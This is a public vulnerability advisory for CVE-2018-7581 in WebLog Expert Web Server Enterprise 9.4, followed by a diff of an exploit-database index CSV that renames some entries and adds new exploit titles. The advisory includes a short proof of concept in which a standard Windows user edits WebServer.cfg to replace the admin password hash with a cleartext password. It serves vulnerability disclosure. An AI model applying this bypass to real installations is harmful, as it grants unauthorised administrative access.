[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WEBLOG-EXPERT-WEB-SERVER-ENTERPRISE-v9.4-AUTHENTICATION-BYPASS.txt
[+] ISR: Apparition Security
Vendor:
========
www.weblogexpert.com
Product:
========
WebLog Expert Web Server Enterprise v9.4
WebLog Expert is a fast and powerful access log analyzer. It will give you information about your site's visitors:
activity statistics, accessed files, paths through the site, information about referring pages, search engines, browsers,
operating systems, and more. The program produces easy-to-read reports that include both text information (tables) and charts.
Vulnerability Type:
===================
Authentication Bypass
CVE Reference:
==============
CVE-2018-7581
Security Issue:
================
The "WebServer.cfg" under "ProgramData\WebLog Expert\WebServer\" used by WebLog Expert Web Server Enterprise 9.4
has weak permissions (BUILTIN\Users:(ID)C), which allows local users to set a cleartext password and login as admin.
A standard non Windows Administrator user can edit the 'WebServer.cfg' file under "C:\ProgramData\WebLog Expert\WebServer"
set to a cleartext password and login as admin.
e.g.
C:\ProgramData\WebLog Expert\WebServer>cacls * | more
C:\ProgramData\WebLog Expert\WebServer\WebServer.cfg BUILTIN\Users:(ID)C
BUILTIN\Administrators:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
Exploit/POC:
=============
Login as a 'Standard' Windows user
Comment out the Admin hashed password using ';' then add any cleartext password as follows.
[User:admin]
Password=1234
;PasswordHash=3413C538CE5234FB194E82AE1F3954FD2BC848C0
bAllProfiles=1
Now login in as Admin! :)
Network Access:
===============
Local
Severity:
=========
Medium
Disclosure Timeline:
=============================
Vendor Notification: March 1, 2018
No replies from previous attempts
March 7, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

43
files_exploits.csv
View file

@ -746,7 +746,7 @@ id,file,description,date,author,type,platform,port
5817,exploits/windows/dos/5817.pl,"Dana IRC 1.3 - Remote Buffer Overflow (PoC)",2008-06-14,t0pP8uZz,dos,windows,
5843,exploits/windows/dos/5843.html,"P2P Foxy - Out of Memory Denial of Service",2008-06-17,Styxosaurus,dos,windows,
5851,exploits/windows/dos/5851.txt,"Visual Basic Enterprise Edition SP6 - 'vb6skit.dll' Buffer Overflow (PoC)",2008-06-18,shinnai,dos,windows,
5918,exploits/windows/dos/5918.pl,"uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 - Range header Denial of Service",2008-06-23,Exodus,dos,windows,
5918,exploits/windows/dos/5918.pl,"μTorrent (uTorrent) / BitTorrent WebIU HTTP 1.7.7/6.0.1 - Range header Denial of Service",2008-06-23,Exodus,dos,windows,
5968,exploits/windows/dos/5968.py,"Surgemail 39e-1 - Authenticated IMAP Remote Buffer Overflow (Denial of Service) (PoC)",2008-06-30,"Travis Warren",dos,windows,
6029,exploits/multiple/dos/6029.txt,"Mozilla Firefox/Evince/EOG/Gimp - '.SVG' Denial of Service (PoC)",2008-07-08,"Kristian Hermansen",dos,multiple,
6043,exploits/osx/dos/6043.rb,"Core Image Fun House 2.0 (OSX) - Arbitrary Code Execution (PoC)",2008-07-11,"Adriel T. Desautels",dos,osx,
@ -1176,7 +1176,7 @@ id,file,description,date,author,type,platform,port
9517,exploits/windows/dos/9517.txt,"Lotus note connector for BlackBerry Manager 5.0.0.11 - ActiveX Denial of Service",2009-08-25,"Francis Provencher",dos,windows,
9528,exploits/windows/dos/9528.py,"TFTPUtil GUI 1.3.0 - Remote Denial of Service",2009-08-26,"ThE g0bL!N",dos,windows,
9537,exploits/windows/dos/9537.html,"Kaspersky 2010 - Remote Memory Corruption / Denial of Service (PoC)",2009-08-28,"Prakhar Prasad",dos,windows,
9539,exploits/windows/dos/9539.py,"uTorrent 1.8.3 Build 15772 - Create New Torrent Buffer Overflow (PoC)",2009-08-28,Dr_IDE,dos,windows,
9539,exploits/windows/dos/9539.py,"μTorrent (uTorrent) 1.8.3 Build 15772 - Create New Torrent Buffer Overflow (PoC)",2009-08-28,Dr_IDE,dos,windows,
9546,exploits/windows/dos/9546.pl,"Swift Ultralite 1.032 - '.m3u' Local Buffer Overflow (PoC)",2009-08-31,hack4love,dos,windows,
9547,exploits/windows/dos/9547.pl,"SolarWinds TFTP Server 9.2.0.111 - Remote Denial of Service",2009-08-31,"Gaurav Baruah",dos,windows,
9549,exploits/windows/dos/9549.c,"MailEnable 1.52 - HTTP Mail Service Stack Buffer Overflow (PoC)",2009-08-31,"fl0 fl0w",dos,windows,
@ -1467,7 +1467,7 @@ id,file,description,date,author,type,platform,port
11985,exploits/windows/dos/11985.sh,"BitComet 1.19 - Remote Denial of Service",2010-03-31,"Pierre Nogues",dos,windows,
12000,exploits/windows/dos/12000.pl,"Kwik Pay Payroll 4.10.3 - '.mdb' Crash (PoC)",2010-04-01,anonymous,dos,windows,
12001,exploits/windows/dos/12001.pl,"Kwik Pay Payroll 4.10.3 - '.zip' Denial of Service",2010-04-01,anonymous,dos,windows,
12010,exploits/windows/dos/12010.pl,"uTorrent WebUI 0.370 - Authorisation Header Denial of Service",2010-04-02,"zombiefx darkernet",dos,windows,
12010,exploits/windows/dos/12010.pl,"μTorrent (uTorrent) WebUI 0.370 - Authorisation Header Denial of Service",2010-04-02,"zombiefx darkernet",dos,windows,
12011,exploits/windows/dos/12011.txt,"Google Chrome 4.1 - Out-of-Bounds Array Indexing",2010-04-02,"Tobias Klein",dos,windows,
12025,exploits/windows/dos/12025.php,"Dualis 20.4 - '.bin' Local Denial of Service",2010-04-03,"Yakir Wizman",dos,windows,
12027,exploits/windows/dos/12027.py,"DSEmu 0.4.10 - '.nds' Local Crash",2010-04-03,l3D,dos,windows,
@ -5890,12 +5890,16 @@ id,file,description,date,author,type,platform,port
44236,exploits/macos/dos/44236.c,"Apple macOS Sierra 10.12.3 - 'IOFireWireFamily-null-deref' FireWire Port Denial of Service",2017-08-16,"Brandon Azad",dos,macos,
44247,exploits/multiple/dos/44247.txt,"Suricata < 4.0.4 - IDS Detection Bypass",2018-03-05,"Positive Technologies",dos,multiple,
44251,exploits/windows/dos/44251.txt,"ActivePDF Toolkit < 8.1.0.19023 - Multiple Memory Corruptions",2018-03-05,"François Goichon",dos,windows,
44254,exploits/linux/dos/44254.py,"Memcached - 'memcrashed' Denial of Service",2018-03-05,"Alex Conrey",dos,linux,11211
44254,exploits/linux/dos/44254.py,"Memcached 1.5.5 - 'Memcrashed' Insufficient Control Network Message Volume Denial of Service (2)",2018-03-05,"Alex Conrey",dos,linux,11211
44255,exploits/windows/dos/44255.txt,"Softros Network Time System Server 2.3.4 - Denial of Service",2018-03-06,hyp3rlinx,dos,windows,
44257,exploits/multiple/dos/44257.js,"Chrome V8 JIT - Simplified-lowererer IrOpcode::kStoreField_ IrOpcode::kStoreElement Optimization Bug",2018-03-06,"Google Security Research",dos,multiple,
44258,exploits/multiple/dos/44258.js,"Chrome V8 JIT - JSBuiltinReducer::ReduceObjectCreate Fails to Ensure that the Prototype is _null_",2018-03-06,"Google Security Research",dos,multiple,
44259,exploits/multiple/dos/44259.js,"Chrome V8 JIT - 'GetSpecializationContext' Type Confusion",2018-03-06,"Google Security Research",dos,multiple,
44260,exploits/multiple/dos/44260.js,"Chrome V8 JIT - Empty BytecodeJumpTable Out-of-Bounds Read",2018-03-06,"Google Security Research",dos,multiple,
44264,exploits/linux/dos/44264.c,"Memcached 1.5.5 - 'Memcrashed' Insufficient Control Network Message Volume Denial of Service (1)",2018-03-05,anonymous,dos,linux,11211
44265,exploits/linux/dos/44265.py,"Memcached 1.5.5 - 'Memcrashed ' Insufficient Control of Network Message Volume Denial of Service With Shodan API",2018-03-08,649,dos,linux,11211
44268,exploits/android/dos/44268.txt,"Broadcom BCM43xx Wi-Fi - 'BroadPWN' Denial of Service",2016-12-01,649,dos,android,
44271,exploits/windows/dos/44271.py,"WebLog Expert Enterprise 9.4 - Denial of Service",2018-03-09,hyp3rlinx,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -7073,7 +7077,7 @@ id,file,description,date,author,type,platform,port
14721,exploits/windows/local/14721.c,"Wireshark 1.2.10 - 'airpcap.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows,
14723,exploits/windows/local/14723.c,"Microsoft PowerPoint 2010 - 'pptimpconv.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows,
14727,exploits/windows/local/14727.py,"Foxit Reader 4.0 - '.pdf' Multiple Stack Based Buffer Overflow 'Jailbreak'",2010-08-24,"Jose Miguel Esparza",local,windows,
14726,exploits/windows/local/14726.c,"uTorrent 2.0.3 - 'plugin_dll.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows,
14726,exploits/windows/local/14726.c,"μTorrent (uTorrent) 2.0.3 - 'plugin_dll.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows,
14728,exploits/windows/local/14728.c,"Microsoft Windows Live Email - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Nicolas Krassas",local,windows,
14730,exploits/windows/local/14730.c,"Mozilla Firefox 3.6.8 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous",local,windows,
14731,exploits/windows/local/14731.c,"Microsoft Windows Movie Maker 2.6.4038.0 - 'hhctrl.ocx' DLL Hijacking",2010-08-24,TheLeader,local,windows,
@ -7089,7 +7093,7 @@ id,file,description,date,author,type,platform,port
14740,exploits/windows/local/14740.c,"Adobe Dreamweaver CS5 11.0 build 4909 - 'mfc90loc.dll' DLL Hijacking",2010-08-25,diwr,local,windows,
14741,exploits/windows/local/14741.c,"Adobe Photoshop CS2 - 'Wintab32.dll' DLL Hijacking",2010-08-25,storm,local,windows,
14743,exploits/windows/local/14743.c,"Avast! 5.0.594 - 'mfc90loc.dll' License Files DLL Hijacking",2010-08-25,diwr,local,windows,
14748,exploits/windows/local/14748.txt,"uTorrent 2.0.3 - DLL Hijacking",2010-08-25,Dr_IDE,local,windows,
14748,exploits/windows/local/14748.txt,"μTorrent (uTorrent) 2.0.3 - DLL Hijacking",2010-08-25,Dr_IDE,local,windows,
14750,exploits/windows/local/14750.txt,"VideoLAN VLC Media Player 1.1.3 - 'wintab32.dll' DLL Hijacking",2010-08-25,Secfence,local,windows,
14751,exploits/windows/local/14751.txt,"Microsoft Vista - 'fveapi.dll' BitLocker Drive Encryption API Hijacking",2010-08-25,"Beenu Arora",local,windows,
14752,exploits/windows/local/14752.c,"Roxio Photosuite 9 - 'homeutils9.dll' DLL Hijacking",2010-08-25,"Beenu Arora",local,windows,
@ -9570,6 +9574,7 @@ id,file,description,date,author,type,platform,port
44204,exploits/linux/local/44204.md,"WebKitGTK 2.1.2 (Ubuntu 14.04) - Heap based Buffer Overflow",2017-08-19,"Ren Kimura",local,linux,
44205,exploits/linux/local/44205.md,"Linux Kernel - 'BadIRET' Local Privilege Escalation",2017-07-24,"Ren Kimura",local,linux,
44206,exploits/hardware/local/44206.c,"Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Loader",2016-04-27,"Carlos Pizarro",local,hardware,
44224,exploits/windows/local/44224.py,"iSumsoft ZIP Password Refixer 3.1.1 - Buffer Overflow",2018-03-02,ScrR1pTK1dd13,local,windows,
38457,exploits/windows/local/38457.c,"ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - '.asx' Local Stack Overflow",2015-10-17,"Ivan Ivanovic",local,windows,
44234,exploits/macos/local/44234.c,"Apple macOS High Sierra 10.13 - 'ctl_ctloutput-leak' Information Leak",2017-12-07,"Brandon Azad",local,macos,
44237,exploits/macos/local/44237.md,"Apple macOS Sierra 10.12.1 - 'physmem' Local Privilege Escalation",2017-01-16,"Brandon Azad",local,macos,
@ -9577,6 +9582,11 @@ id,file,description,date,author,type,platform,port
44243,exploits/windows/local/44243.pl,"Xion 1.0.125 - '.m3u' Local SEH-Based Unicode Venetian Exploit",2018-03-05,synthetic,local,windows,
44244,exploits/windows/local/44244.py,"Dup Scout Enterprise 10.5.12 - 'Share Username' Local Buffer Overflow",2018-03-05,bzyo,local,windows,
44246,exploits/linux/local/44246.txt,"Sophos UTM 9.410 - 'loginuser' 'confd' Service Privilege Escalation",2018-03-05,KoreLogic,local,linux,
44263,exploits/windows/local/44263.md,"Microsoft Office - 'Composite Moniker Remote Code Execution",2018-01-09,"Rich Warren",local,windows,
44266,exploits/multiple/local/44266.html,"Mozilla Firefox - Address Bar Spoofing",2017-04-14,649,local,multiple,
44267,exploits/windows/local/44267.md,"Tor (Firefox 41 < 50) - Code Execution",2016-12-01,649,local,windows,
44269,exploits/windows/local/44269.txt,"Chrome 35.0.1916.153 - Sandbox Escape / Command Execution",2017-10-14,649,local,windows,
44270,exploits/windows/local/44270.txt,"WebLog Expert Enterprise 9.4 - Authentication Bypass",2018-03-09,hyp3rlinx,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -10166,7 +10176,7 @@ id,file,description,date,author,type,platform,port
3291,exploits/windows/remote/3291.pl,"SAP Web Application Server 6.40 - Arbitrary File Disclosure",2007-02-08,Nicob,remote,windows,
3293,exploits/solaris/remote/3293.sh,"SunOS 5.10/5.11 in.TelnetD - Remote Authentication Bypass",2007-02-11,kingcope,remote,solaris,23
3294,exploits/hardware/remote/3294.txt,"IP3 NetAccess < 4.1.9.6 - Arbitrary File Disclosure",2007-02-11,"Sebastian Wolfgarten",remote,hardware,80
3296,exploits/windows/remote/3296.c,"uTorrent 1.6 build 474 - 'announce' Key Remote Heap Overflow",2007-02-12,defsec,remote,windows,
3296,exploits/windows/remote/3296.c,"μTorrent (uTorrent) 1.6 build 474 - 'announce' Key Remote Heap Overflow",2007-02-12,defsec,remote,windows,
3302,exploits/windows/remote/3302.sh,"Lotus Domino R6 Webmail - Remote Password Hash Dumper",2007-02-13,"Marco Ivaldi",remote,windows,80
3303,exploits/multiple/remote/3303.sh,"Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timing Attack",2007-02-13,"Marco Ivaldi",remote,multiple,
3319,exploits/windows/remote/3319.pl,"MailEnable IMAPD Enterprise 2.32 < 2.34 - Remote Buffer Overflow",2007-02-16,mu-b,remote,windows,143
@ -12231,7 +12241,7 @@ id,file,description,date,author,type,platform,port
19537,exploits/windows/remote/19537.txt,"teamshare teamtrack 3.0 - Directory Traversal",1999-10-02,"rain forest puppy",remote,windows,
19538,exploits/hardware/remote/19538.txt,"Hybrid Networks Cable Broadband Access System 1.0 - Remote Configuration",1999-10-05,KSR[T],remote,hardware,
19539,exploits/windows/remote/19539.txt,"Microsoft Internet Explorer 5.0/4.0.1 - iFrame",1999-10-11,"Georgi Guninski",remote,windows,
19540,exploits/windows/remote/19540.txt,"t. hauck jana WebServer 1.0/1.45/1.46 - Directory Traversal",1999-10-08,"Jason Lutz",remote,windows,
19540,exploits/windows/remote/19540.txt,"T. Hauck Jana Server 1.0/1.45/1.46 - Directory Traversal",1999-10-08,"Jason Lutz",remote,windows,
19553,exploits/php/remote/19553.txt,"PHP/FI 1.0/FI 2.0/FI 2.0 b10 - mylog/mlog",1997-10-19,"Bryan Berg",remote,php,
19554,exploits/hardware/remote/19554.c,"Lucent Ascend MAX 5.0/Pipeline 6.0/TNT 1.0/2.0 Router - MAX UDP Port 9 (1)",1998-03-16,Rootshell,remote,hardware,
19555,exploits/hardware/remote/19555.pl,"Lucent Ascend MAX 5.0/Pipeline 6.0/TNT 1.0/2.0 Router - MAX UDP Port 9 (2)",1998-03-17,Rootshell,remote,hardware,
@ -16048,6 +16058,7 @@ id,file,description,date,author,type,platform,port
43386,exploits/linux/remote/43386.py,"Fortinet FortiGate 4.x < 5.0.7 - SSH Backdoor Access",2016-01-09,operator8203,remote,linux,
43387,exploits/hardware/remote/43387.py,"Netcore / Netis Routers - UDP Backdoor Access",2016-12-15,nixawk,remote,hardware,53413
43388,exploits/multiple/remote/43388.md,"Trend Micro Smart Protection Server - Session Hijacking / Log File Disclosure / Remote Command Execution / Cron Job Injection / Local File Inclusion / Stored Cross-Site Scripting / Improper Access Control",2017-12-19,CoreLabs,remote,multiple,
43392,exploits/multiple/remote/43392.py,"Oracle WebLogic Server 10.3.6.0.0 / 12.x - Remote Command Execution",2017-12-26,1337g,remote,multiple,
43407,exploits/windows/remote/43407.rb,"ALLMediaServer 0.95 - Remote Buffer Overflow (Metasploit)",2017-12-28,"Anurag Srivastava",remote,windows,
43408,exploits/windows/remote/43408.py,"NetTransport 2.96L - Remote Buffer Overflow (DEP Bypass)",2017-12-29,"Aloyce J. Makalanga",remote,windows,
43411,exploits/windows/remote/43411.rb,"HP Mercury LoadRunner Agent magentproc.exe - Remote Command Execution (Metasploit)",2018-01-01,Metasploit,remote,windows,54345
@ -16070,6 +16081,7 @@ id,file,description,date,author,type,platform,port
43523,exploits/windows/remote/43523.py,"ALLMediaServer 0.95 - Remote Buffer Overflow",2018-01-11,"Mario Kartone Ciccarelli",remote,windows,
41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows,
43902,exploits/multiple/remote/43902.py,"BMC BladeLogic 8.3.00.64 - Remote Command Execution",2018-01-26,"Paul Taylor",remote,multiple,
43905,exploits/multiple/remote/43905.py,"Werkzeug - 'Debug Shell' Command Execution",2018-01-28,"Ali BawazeEer",remote,multiple,
43920,exploits/linux/remote/43920.py,"Trend Micro Threat Discovery Appliance 2.6.1062r1 - 'dlp_policy_upload.cgi' Remote Code Execution",2018-01-28,mr_me,remote,linux,
43924,exploits/multiple/remote/43924.rb,"Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution (Metasploit)",2018-01-29,Metasploit,remote,multiple,
43927,exploits/windows/remote/43927.txt,"HPE iMC 7.3 - RMI Java Deserialization",2018-01-30,"Chris Lyne",remote,windows,
@ -18808,7 +18820,7 @@ id,file,description,date,author,type,platform,port
4937,exploits/php/webapps/4937.txt,"Small Axe 0.3.1 - 'cfile' Remote File Inclusion",2008-01-18,RoMaNcYxHaCkEr,webapps,php,
4939,exploits/php/webapps/4939.txt,"WordPress Plugin WP-Forum 1.7.4 - SQL Injection",2008-01-19,"websec Team",webapps,php,
4940,exploits/php/webapps/4940.pl,"Mini File Host 1.2.1 - 'language' Local File Inclusion",2008-01-20,shinmai,webapps,php,
4942,exploits/php/webapps/4942.txt,"TikiWiki < 1.9.9 - 'tiki-listmovies.php' Directory Traversal",2008-01-20,Sha0,webapps,php,
4942,exploits/php/webapps/4942.txt,"TikiWiki Project < 1.9.9 - 'tiki-listmovies.php' Directory Traversal",2008-01-20,Sha0,webapps,php,
4943,exploits/php/webapps/4943.txt,"Frimousse 0.0.2 - 'explorerdir.php' Local Directory Traversal",2008-01-20,Houssamix,webapps,php,
4944,exploits/php/webapps/4944.txt,"360 Web Manager 3.0 - 'IDFM' SQL Injection",2008-01-20,"Ded MustD!e",webapps,php,
4945,exploits/php/webapps/4945.txt,"bloofox 0.3 - SQL Injection / File Disclosure",2008-01-20,BugReport.IR,webapps,php,
@ -23778,7 +23790,7 @@ id,file,description,date,author,type,platform,port
12767,exploits/php/webapps/12767.txt,"parlic Design - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-27,XroGuE,webapps,php,
12768,exploits/php/webapps/12768.txt,"Hampshire Trading Standards Script - SQL Injection",2010-05-27,Mr.P3rfekT,webapps,php,
12769,exploits/php/webapps/12769.txt,"Joomla! Component com_mediqna 1.1 - Local File Inclusion",2010-05-27,kaMtiEz,webapps,php,
12770,exploits/php/webapps/12770.txt,"toronja CMS - SQL Injection",2010-05-27,cyberlog,webapps,php,
12770,exploits/php/webapps/12770.txt,"Toronja CMS - SQL Injection",2010-05-27,cyberlog,webapps,php,
12771,exploits/php/webapps/12771.txt,"Toronja CMS - HTML / Cross-Site Scripting Injection",2010-05-27,CoBRa_21,webapps,php,
12772,exploits/php/webapps/12772.txt,"Realtor WebSite System E-Commerce - SQL Injection",2010-05-27,cyberlog,webapps,php,
12773,exploits/php/webapps/12773.txt,"Realtor Real Estate Agent - 'idproperty' SQL Injection",2010-05-28,v3n0m,webapps,php,
@ -32408,7 +32420,7 @@ id,file,description,date,author,type,platform,port
31669,exploits/php/webapps/31669.txt,"Wikepage Opus 13 2007.2 - 'wiki' Cross-Site Scripting",2008-04-18,"Gerendi Sandor Attila",webapps,php,
31670,exploits/php/webapps/31670.txt,"WordPress 2.3.3 - 'cat' Directory Traversal",2008-04-18,"Gerendi Sandor Attila",webapps,php,
31671,exploits/php/webapps/31671.html,"TorrentFlux 2.3 - 'admin.php' Cross-Site Request Forgery (Add Admin)",2008-04-18,"Michael Brooks",webapps,php,
31672,exploits/php/webapps/31672.txt,"uTorrent WebUI 0.310 Beta 2 - Cross-Site Request Forgery",2008-04-18,th3.r00k,webapps,php,
31672,exploits/php/webapps/31672.txt,"μTorrent (uTorrent) WebUI 0.310 Beta 2 - Cross-Site Request Forgery",2008-04-18,th3.r00k,webapps,php,
31673,exploits/multiple/webapps/31673.txt,"Azureus HTML WebUI 0.7.6 - Cross-Site Request Forgery",2008-04-18,th3.r00k,webapps,multiple,
31674,exploits/php/webapps/31674.txt,"XOOPS Recette 2.2 - 'detail.php' SQL Injection",2008-04-19,S@BUN,webapps,php,
31676,exploits/php/webapps/31676.txt,"Host Directory PRO - Cookie Security Bypass",2008-04-20,Crackers_Child,webapps,php,
@ -36328,8 +36340,8 @@ id,file,description,date,author,type,platform,port
38174,exploits/multiple/webapps/38174.txt,"ManageEngine OpManager 11.5 - Multiple Vulnerabilities",2015-09-14,xistence,webapps,multiple,
38176,exploits/php/webapps/38176.txt,"WordPress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities",2015-09-14,"Felipe Molina",webapps,php,
38182,exploits/php/webapps/38182.txt,"tinybrowser - 'type' Cross-Site Scripting",2013-01-09,MustLive,webapps,php,
38183,exploits/php/webapps/38183.txt,"tinybrowser - 'tinybrowser.php' Directory Listing",2013-01-09,MustLive,webapps,php,
38184,exploits/php/webapps/38184.txt,"tinybrowser - 'edit.php' Directory Listing",2013-01-09,MustLive,webapps,php,
38183,exploits/php/webapps/38183.txt,"TinyBrowser - 'tinybrowser.php' Directory Listing",2013-01-09,MustLive,webapps,php,
38184,exploits/php/webapps/38184.txt,"TinyBrowser - 'edit.php' Directory Listing",2013-01-09,MustLive,webapps,php,
38187,exploits/php/webapps/38187.txt,"WordPress Plugin CP Reservation Calendar 1.1.6 - SQL Injection",2015-09-15,"i0akiN SEC-LABORATORY",webapps,php,80
38188,exploits/jsp/webapps/38188.txt,"Openfire 3.10.2 - Unrestricted Arbitrary File Upload",2015-09-15,hyp3rlinx,webapps,jsp,80
38189,exploits/jsp/webapps/38189.txt,"Openfire 3.10.2 - Remote File Inclusion",2015-09-15,hyp3rlinx,webapps,jsp,
@ -37004,7 +37016,7 @@ id,file,description,date,author,type,platform,port
39580,exploits/php/webapps/39580.txt,"Disc ORGanizer (DORG) - Multiple Vulnerabilities",2016-03-21,SECUPENT,webapps,php,80
39581,exploits/hardware/webapps/39581.txt,"D-Link DWR-932 Firmware 4.00 - Authentication Bypass",2016-03-21,"Saeed reza Zamanian",webapps,hardware,80
39582,exploits/php/webapps/39582.txt,"Xoops 2.5.7.2 - Cross-Site Request Forgery (Arbitrary User Deletions)",2016-03-21,hyp3rlinx,webapps,php,80
39583,exploits/php/webapps/39583.txt,"Xoops 2.5.7.2 - Directory Traversal Bypass",2016-03-21,hyp3rlinx,webapps,php,80
39583,exploits/php/webapps/39583.txt,"XOOPS 2.5.7.2 - Directory Traversal Bypass",2016-03-21,hyp3rlinx,webapps,php,80
39584,exploits/php/webapps/39584.txt,"WordPress Plugin Image Export 1.1.0 - Arbitrary File Disclosure",2016-03-21,AMAR^SHG,webapps,php,80
39586,exploits/php/webapps/39586.txt,"Dating Pro Genie 2015.7 - Cross-Site Request Forgery",2016-03-21,"High-Tech Bridge SA",webapps,php,80
39587,exploits/php/webapps/39587.txt,"iTop 2.2.1 - Cross-Site Request Forgery",2016-03-21,"High-Tech Bridge SA",webapps,php,80
@ -38025,6 +38037,7 @@ id,file,description,date,author,type,platform,port
43399,exploits/php/webapps/43399.txt,"Easy!Appointments 1.2.1 - Cross-Site Scripting",2017-12-27,LiquidWorm,webapps,php,
43400,exploits/hardware/webapps/43400.html,"Telesquare SKT LTE Router SDT-CS3B1 - Cross-Site Request Forgery",2017-12-27,LiquidWorm,webapps,hardware,
43402,exploits/hardware/webapps/43402.txt,"Telesquare SKT LTE Router SDT-CS3B1 - Information Disclosure",2017-12-27,LiquidWorm,webapps,hardware,
43404,exploits/multiple/webapps/43404.py,"SAP BusinessObjects launch pad - Server-Side Request Forgery",2017-12-27,"Ahmad Mahfouz",webapps,multiple,
43405,exploits/aspx/webapps/43405.rb,"DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download (Metasploit)",2017-12-27,"Glafkos Charalambous",webapps,aspx,
43409,exploits/php/webapps/43409.txt,"PHP Melody 2.7.1 - 'playlist' SQL Injection",2017-12-31,"Ahmad Mahfouz",webapps,php,
43414,exploits/hardware/webapps/43414.py,"Huawei Router HG532 - Arbitrary Command Execution",2017-12-25,anonymous,webapps,hardware,37215
@ -38965,6 +38978,7 @@ id,file,description,date,author,type,platform,port
44194,exploits/php/webapps/44194.py,"Concrete5 < 8.3.0 - Username / Comments Enumeration",2018-02-27,"Chapman Schleiss",webapps,php,
44216,exploits/perl/webapps/44216.txt,"Routers2 2.24 - Cross-Site Scripting",2018-02-28,"Lorenzo Di Fuccia",webapps,perl,
44219,exploits/hardware/webapps/44219.txt,"D-Link DIR-600M Wireless - Cross-Site Scripting",2018-03-02,"Prasenjit Kanti Paul",webapps,hardware,
44220,exploits/multiple/webapps/44220.txt,"antMan < 0.9.1a - Authentication Bypass",2018-03-02,"Joshua Bowser",webapps,multiple,
44223,exploits/php/webapps/44223.txt,"uWSGI < 2.0.17 - Directory Traversal",2018-03-02,"Marios Nicolaides",webapps,php,
44241,exploits/windows/webapps/44241.txt,"Parallels Remote Application Server 15.5 - Path Traversal",2018-02-22,"Nicolas Markitanis",webapps,windows,
44250,exploits/php/webapps/44250.txt,"ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection",2018-03-05,"SEC Consult",webapps,php,80
@ -38972,3 +38986,4 @@ id,file,description,date,author,type,platform,port
44256,exploits/multiple/webapps/44256.html,"Bravo Tejari Web Portal - Cross-Site Request Forgery",2018-03-06,"Arvind V",webapps,multiple,
44261,exploits/php/webapps/44261.txt,"Redaxo CMS Addon MyEvents 2.2.1 - SQL Injection",2018-03-07,h0n1gsp3cht,webapps,php,80
44262,exploits/java/webapps/44262.txt,"antMan 0.9.0c - Authentication Bypass",2018-03-07,"Joshua Bowser",webapps,java,3000
44272,exploits/php/webapps/44272.txt,"Bacula-Web < 8.0.0-rc2 - SQL Injection",2018-03-09,"Gustavo Sorondo",webapps,php,

Can't render this file because it is too large.